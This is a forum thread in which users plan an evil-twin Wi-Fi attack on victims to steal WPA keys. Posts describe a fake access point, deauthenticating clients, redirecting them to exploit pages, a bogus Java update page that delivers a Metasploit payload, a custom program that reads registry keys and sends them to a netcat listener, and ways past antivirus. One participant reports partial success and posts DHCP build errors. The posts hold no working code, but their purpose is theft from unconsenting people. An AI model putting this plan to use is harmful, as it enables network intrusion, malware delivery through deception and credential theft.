my initial idea was to just dump specific info, but like you said it is a pain trying to find what you want,
then I looked into karmetasploit and thought why dont we do this
create a fake ap using airbase-ng, user is redirected to exploitable page and the exploits run in iframes, we dump the whole registry.
and then search the registry in our own time, we can be prepared next time by having the wpa keys, and as you said all sorts of other vital information
now what we need is a single universal way of uploading a payload, my guess would be to create something on the redirected page
or if that is too difficult then a page that says please re-enter your wpa keyOriginally Posted by woistfred
mhh... you're thinking of some javascript / activeX payload in order to even succeed with fully patched systems , don't you ?
but thats been done before
Just being mucking around with dlink and dse wireless third party uilitys and they are in the same area.
Just looked up how to read the reg in C, so I will try and write a exe that can be uploaded with metasploit and excuted, the program would read about 10 key folders and send it out a socket(connect using nc on bt to say port 6000) and display the strings etc. I think most av don't detect programs that use that function, just the order and stuff.
Is autopwn included with BT3?
Nvm, didnt realize it was part of Fast Track
I hate Google.
I've been further thinking of this,
if we did somehow manage to dump the wpa hash from the registry we would still need to decrypt it, in windows you can use cain, but even so that takes a long time too.
so unless the user is prompted to give us the wpa key I don't think it is going to work.
POC... Create fake ap, user connects to fake ap, evilgrade, upload msf payload, connect back to pc, this should work, but then what? we still have the problem of obtaining the wpa key
If the wpa keys are stored in the regisrty encrypted or not, it will still need a key in the regisrty or in some place to decode it for the wireless connection.
I'm guessing but it would proable be something like the accountid, and md5
a bit more progress,
we can use this tool http://www.nirsoft.net/utils/wireless_key.html, upload it and execute via command line, can save all keys to a text file
gives all keys in hex.
very well explained dude, cheerz for that
we would still need the final stage of getting a msf payload onto our victim if it's a fully patched system,
drive by downloads are an option but need a way to bypass AV's with these
I've been looking into evilgrade and one of our options maybe to have a page that displays JAVA but then says it needs to be updated and have an update link embedded within it --- I know we can deliver payload by directly forcing them to download an exe but that would be too suspicious, instead we let them think it's a real upgrade.
I've also been looking into one time redirection only, we don't want our victim to be constantly viewing the same page, we want them to type any address in, get redirected to the "portal" and then be able to surf happily.
Something similar to nocatsplash, - this seems interesting http://www.cs.usfca.edu/~afedosov/netgreg/
Ok, This thread is exactly what I am trying to do myself. I just have a few problems that I need to solve.
What I have working: Evil Ap, Aireplay is doing a massive DDOS to the victims AP, All clients are not associated and are probing the ESSID.
Ok, so the basics is done
Now I need to get the DHCP server up and running to assign ip address's to the clients.
I downloaded dhcp-3.0.7 from the ISC site, but I am having problems installing it. Not sure if its compatible with Backtrack3. Any ideas here? This is the error is piping to meAfter this I just wanted to see if it would >make and this is that errorCode:bt dhcp-3.0.7 # ./configure System Type: linux-2.2 make[1]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2' make[1]: Warning: File `Makefile' has modification time 1.4e+04 s in the future Making links in common make[2]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common' make[2]: Warning: File `Makefile' has modification time 1.4e+04 s in the future ln: creating symbolic link `raw.c': Operation not supported ln: creating symbolic link `parse.c': Operation not supported ln: creating symbolic link `nit.c': Operation not supported THIS GOES ON FOR A PAGE ln: creating symbolic link `dhcp-eval.5': Operation not supported make[2]: *** [links] Error 1 make[2]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common' make[1]: *** [links] Error 1 make[1]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2' make: *** [links] Error 2
So this is where I am stuck at. Any help would be greatly appreciated.Code:bt dhcp-3.0.7 # make make[1]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2' make[1]: Warning: File `Makefile' has modification time 1.4e+04 s in the future Making all in common make[2]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common' make[2]: Warning: File `Makefile' has modification time 1.4e+04 s in the future make[2]: *** No rule to make target `raw.o', needed by `libdhcp.a'. Stop. make[2]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common' make[1]: *** [all] Error 1 make[1]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2' make: *** [all] Error 2
Also I would like to add. I think this is one of the best ways of attacking WPA/WPA2 networks. Bruteforcing just does not work very well with all the possible keys you can have unless you put the key in your dictionary file.
I would love to see an in-depth tutorial on this subject. That would be purely awesome.
Posting Permissions
